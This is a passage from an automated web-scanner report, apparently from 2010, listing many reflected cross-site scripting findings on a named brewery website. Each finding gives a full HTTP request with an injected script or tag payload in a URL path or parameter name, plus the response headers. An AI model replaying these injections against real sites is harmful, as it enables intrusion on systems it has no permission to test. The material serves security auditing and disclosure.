The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f15af"><a>10c219e5d62 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /companyf15af"><a>10c219e5d62/content/js/combined.css HTTP/1.1 Host: www.ninkasibrewing.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: PHPSESSID=4o33ishep9gqp223c2cg8e5jf1;
Response
HTTP/1.1 200 OK Date: Sun, 21 Nov 2010 21:49:27 GMT Server: Apache X-Powered-By: PHP/5.2.14 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Connection: close Vary: Accept-Encoding Content-Type: text/html Content-Length: 13214
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head>
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 95cc6"><a>4a3776524c8 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /company95cc6"><a>4a3776524c8/content/js/combined.js HTTP/1.1 Host: www.ninkasibrewing.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: PHPSESSID=4o33ishep9gqp223c2cg8e5jf1;
Response
HTTP/1.1 200 OK Date: Sun, 21 Nov 2010 21:50:11 GMT Server: Apache X-Powered-By: PHP/5.2.14 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Connection: close Vary: Accept-Encoding Content-Type: text/html Content-Length: 13214
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head>
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3673a"><a>3f6d411eb9a was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /contact3673a"><a>3f6d411eb9a/ HTTP/1.1 Host: www.ninkasibrewing.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Referer: http://www.ninkasibrewing.com/ Cookie: PHPSESSID=lgog9cm9mfbve3sk8vts9buej4;
Response
HTTP/1.1 200 OK Date: Sun, 21 Nov 2010 21:44:35 GMT Server: Apache X-Powered-By: PHP/5.2.14 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Connection: close Vary: Accept-Encoding Content-Type: text/html Content-Length: 13214
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head>
1.183. http://www.ninkasibrewing.com/contact/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.ninkasibrewing.com
Path:
/contact/
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4a1f4"><script>alert(1)</script>795f4542f78 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /contact/?4a1f4"><script>alert(1)</script>795f4542f78=1 HTTP/1.1 Host: www.ninkasibrewing.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Referer: http://www.ninkasibrewing.com/ Cookie: PHPSESSID=lgog9cm9mfbve3sk8vts9buej4;
Response
HTTP/1.1 200 OK Date: Sun, 21 Nov 2010 21:44:35 GMT Server: Apache X-Powered-By: PHP/5.2.14 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Connection: close Vary: Accept-Encoding Content-Type: text/html Content-Length: 14646
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head>
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d20c6"><a>9742955dd12 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /contactd20c6"><a>9742955dd12/content/css/basic.css HTTP/1.1 Host: www.ninkasibrewing.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: PHPSESSID=4o33ishep9gqp223c2cg8e5jf1;
Response
HTTP/1.1 200 OK Date: Sun, 21 Nov 2010 21:50:05 GMT Server: Apache X-Powered-By: PHP/5.2.14 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Connection: close Vary: Accept-Encoding Content-Type: text/html Content-Length: 13214
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head>
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload efd65"><script>alert(1)</script>ad60b82afba was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /contact/contentefd65"><script>alert(1)</script>ad60b82afba/css/basic.css HTTP/1.1 Host: www.ninkasibrewing.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: PHPSESSID=4o33ishep9gqp223c2cg8e5jf1;
Response
HTTP/1.1 200 OK Date: Sun, 21 Nov 2010 21:50:39 GMT Server: Apache X-Powered-By: PHP/5.2.14 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Connection: close Vary: Accept-Encoding Content-Type: text/html Content-Length: 14664
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head>
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 42b42"><script>alert(1)</script>5fe47e91d14 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /contact/content/css42b42"><script>alert(1)</script>5fe47e91d14/basic.css HTTP/1.1 Host: www.ninkasibrewing.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: PHPSESSID=4o33ishep9gqp223c2cg8e5jf1;
Response
HTTP/1.1 200 OK Date: Sun, 21 Nov 2010 21:50:54 GMT Server: Apache X-Powered-By: PHP/5.2.14 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Connection: close Vary: Accept-Encoding Content-Type: text/html Content-Length: 14664
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head>
The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a8dca"><script>alert(1)</script>7f9c03b7e41 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /contact/content/css/basic.cssa8dca"><script>alert(1)</script>7f9c03b7e41 HTTP/1.1 Host: www.ninkasibrewing.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: PHPSESSID=4o33ishep9gqp223c2cg8e5jf1;
Response
HTTP/1.1 200 OK Date: Sun, 21 Nov 2010 21:51:14 GMT Server: Apache X-Powered-By: PHP/5.2.14 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Connection: close Vary: Accept-Encoding Content-Type: text/html Content-Length: 14664
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head>
1.188. http://www.ninkasibrewing.com/contact/content/css/basic.css [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.ninkasibrewing.com
Path:
/contact/content/css/basic.css
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 980af"><script>alert(1)</script>56ae7003a68 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /contact/content/css/basic.css?980af"><script>alert(1)</script>56ae7003a68=1 HTTP/1.1 Host: www.ninkasibrewing.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: PHPSESSID=4o33ishep9gqp223c2cg8e5jf1;
Response
HTTP/1.1 200 OK Date: Sun, 21 Nov 2010 21:49:40 GMT Server: Apache X-Powered-By: PHP/5.2.14 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Connection: close Vary: Accept-Encoding Content-Type: text/html Content-Length: 14667
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head>
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 58806"><a>7369f1313b0 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /contact58806"><a>7369f1313b0/content/css/ninkasi.css HTTP/1.1 Host: www.ninkasibrewing.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: PHPSESSID=4o33ishep9gqp223c2cg8e5jf1;
Response
HTTP/1.1 200 OK Date: Sun, 21 Nov 2010 21:50:06 GMT Server: Apache X-Powered-By: PHP/5.2.14 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Connection: close Vary: Accept-Encoding Content-Type: text/html Content-Length: 13214
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head>
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2c274"><script>alert(1)</script>f1c489d6303 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /contact/content2c274"><script>alert(1)</script>f1c489d6303/css/ninkasi.css HTTP/1.1 Host: www.ninkasibrewing.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: PHPSESSID=4o33ishep9gqp223c2cg8e5jf1;
Response
HTTP/1.1 200 OK Date: Sun, 21 Nov 2010 21:50:35 GMT Server: Apache X-Powered-By: PHP/5.2.14 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Connection: close Vary: Accept-Encoding Content-Type: text/html Content-Length: 14666
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head>
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 82f7e"><script>alert(1)</script>9aa410def61 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /contact/content/css82f7e"><script>alert(1)</script>9aa410def61/ninkasi.css HTTP/1.1 Host: www.ninkasibrewing.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: PHPSESSID=4o33ishep9gqp223c2cg8e5jf1;
Response
HTTP/1.1 200 OK Date: Sun, 21 Nov 2010 21:50:50 GMT Server: Apache X-Powered-By: PHP/5.2.14 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Connection: close Vary: Accept-Encoding Content-Type: text/html Content-Length: 14666
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head>
The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6cd3d"><script>alert(1)</script>7317fbbfebc was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /contact/content/css/ninkasi.css6cd3d"><script>alert(1)</script>7317fbbfebc HTTP/1.1 Host: www.ninkasibrewing.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: PHPSESSID=4o33ishep9gqp223c2cg8e5jf1;
Response
HTTP/1.1 200 OK Date: Sun, 21 Nov 2010 21:51:10 GMT Server: Apache X-Powered-By: PHP/5.2.14 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Connection: close Vary: Accept-Encoding Content-Type: text/html Content-Length: 14666
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head>
1.193. http://www.ninkasibrewing.com/contact/content/css/ninkasi.css [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.ninkasibrewing.com
Path:
/contact/content/css/ninkasi.css
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 75689"><script>alert(1)</script>73fec1f51e1 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /contact/content/css/ninkasi.css?75689"><script>alert(1)</script>73fec1f51e1=1 HTTP/1.1 Host: www.ninkasibrewing.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: PHPSESSID=4o33ishep9gqp223c2cg8e5jf1;
Response
HTTP/1.1 200 OK Date: Sun, 21 Nov 2010 21:49:40 GMT Server: Apache X-Powered-By: PHP/5.2.14 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Connection: close Vary: Accept-Encoding Content-Type: text/html Content-Length: 14669
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head>
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3c04d"><a>af08b404133 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /contact3c04d"><a>af08b404133/content/css/print.css HTTP/1.1 Host: www.ninkasibrewing.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: PHPSESSID=4o33ishep9gqp223c2cg8e5jf1;
Response
HTTP/1.1 200 OK Date: Sun, 21 Nov 2010 21:50:14 GMT Server: Apache X-Powered-By: PHP/5.2.14 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Connection: close Vary: Accept-Encoding Content-Type: text/html Content-Length: 13214
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head>
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 491d9"><script>alert(1)</script>1368f5426b7 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /contact/content491d9"><script>alert(1)</script>1368f5426b7/css/print.css HTTP/1.1 Host: www.ninkasibrewing.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: PHPSESSID=4o33ishep9gqp223c2cg8e5jf1;
Response
HTTP/1.1 200 OK Date: Sun, 21 Nov 2010 21:50:45 GMT Server: Apache X-Powered-By: PHP/5.2.14 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Connection: close Vary: Accept-Encoding Content-Type: text/html Content-Length: 14664
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head>
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a3975"><script>alert(1)</script>25a1ae6dfbb was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /contact/content/cssa3975"><script>alert(1)</script>25a1ae6dfbb/print.css HTTP/1.1 Host: www.ninkasibrewing.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: PHPSESSID=4o33ishep9gqp223c2cg8e5jf1;
Response
HTTP/1.1 200 OK Date: Sun, 21 Nov 2010 21:51:01 GMT Server: Apache X-Powered-By: PHP/5.2.14 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Connection: close Vary: Accept-Encoding Content-Type: text/html Content-Length: 14664
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head>
The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload aad60"><script>alert(1)</script>24a7647a021 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /contact/content/css/print.cssaad60"><script>alert(1)</script>24a7647a021 HTTP/1.1 Host: www.ninkasibrewing.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: PHPSESSID=4o33ishep9gqp223c2cg8e5jf1;
Response
HTTP/1.1 200 OK Date: Sun, 21 Nov 2010 21:51:18 GMT Server: Apache X-Powered-By: PHP/5.2.14 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Connection: close Vary: Accept-Encoding Content-Type: text/html Content-Length: 14664
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head>
1.198. http://www.ninkasibrewing.com/contact/content/css/print.css [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.ninkasibrewing.com
Path:
/contact/content/css/print.css
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 930c6"><script>alert(1)</script>3fba331014d was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /contact/content/css/print.css?930c6"><script>alert(1)</script>3fba331014d=1 HTTP/1.1 Host: www.ninkasibrewing.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: PHPSESSID=4o33ishep9gqp223c2cg8e5jf1;
Response
HTTP/1.1 200 OK Date: Sun, 21 Nov 2010 21:49:45 GMT Server: Apache X-Powered-By: PHP/5.2.14 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Connection: close Vary: Accept-Encoding Content-Type: text/html Content-Length: 14667
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head>
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a3dd3"><a>cd8ecc31aad was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /contacta3dd3"><a>cd8ecc31aad/content/js/basic.js HTTP/1.1 Host: www.ninkasibrewing.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: PHPSESSID=4o33ishep9gqp223c2cg8e5jf1;
Response
HTTP/1.1 200 OK Date: Sun, 21 Nov 2010 21:50:55 GMT Server: Apache X-Powered-By: PHP/5.2.14 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Connection: close Vary: Accept-Encoding Content-Type: text/html Content-Length: 13214
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head>
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1adf7"><script>alert(1)</script>54796ec5c3d was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /contact/content1adf7"><script>alert(1)</script>54796ec5c3d/js/basic.js HTTP/1.1 Host: www.ninkasibrewing.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: PHPSESSID=4o33ishep9gqp223c2cg8e5jf1;
Response
HTTP/1.1 200 OK Date: Sun, 21 Nov 2010 21:51:21 GMT Server: Apache X-Powered-By: PHP/5.2.14 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Connection: close Vary: Accept-Encoding Content-Type: text/html Content-Length: 14662
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head>
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b9463"><script>alert(1)</script>0cdb8fc9cbc was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /contact/content/jsb9463"><script>alert(1)</script>0cdb8fc9cbc/basic.js HTTP/1.1 Host: www.ninkasibrewing.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: PHPSESSID=4o33ishep9gqp223c2cg8e5jf1;
Response
HTTP/1.1 200 OK Date: Sun, 21 Nov 2010 21:51:21 GMT Server: Apache X-Powered-By: PHP/5.2.14 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Connection: close Vary: Accept-Encoding Content-Type: text/html Content-Length: 14662
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head>
The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9b208"><script>alert(1)</script>e00028e101d was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /contact/content/js/basic.js9b208"><script>alert(1)</script>e00028e101d HTTP/1.1 Host: www.ninkasibrewing.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: PHPSESSID=4o33ishep9gqp223c2cg8e5jf1;
Response
HTTP/1.1 200 OK Date: Sun, 21 Nov 2010 21:51:23 GMT Server: Apache X-Powered-By: PHP/5.2.14 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Connection: close Vary: Accept-Encoding Content-Type: text/html Content-Length: 14662
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head>
1.203. http://www.ninkasibrewing.com/contact/content/js/basic.js [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.ninkasibrewing.com
Path:
/contact/content/js/basic.js
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 407cb"><script>alert(1)</script>31b20d5279f was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /contact/content/js/basic.js?407cb"><script>alert(1)</script>31b20d5279f=1 HTTP/1.1 Host: www.ninkasibrewing.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: PHPSESSID=4o33ishep9gqp223c2cg8e5jf1;
Response
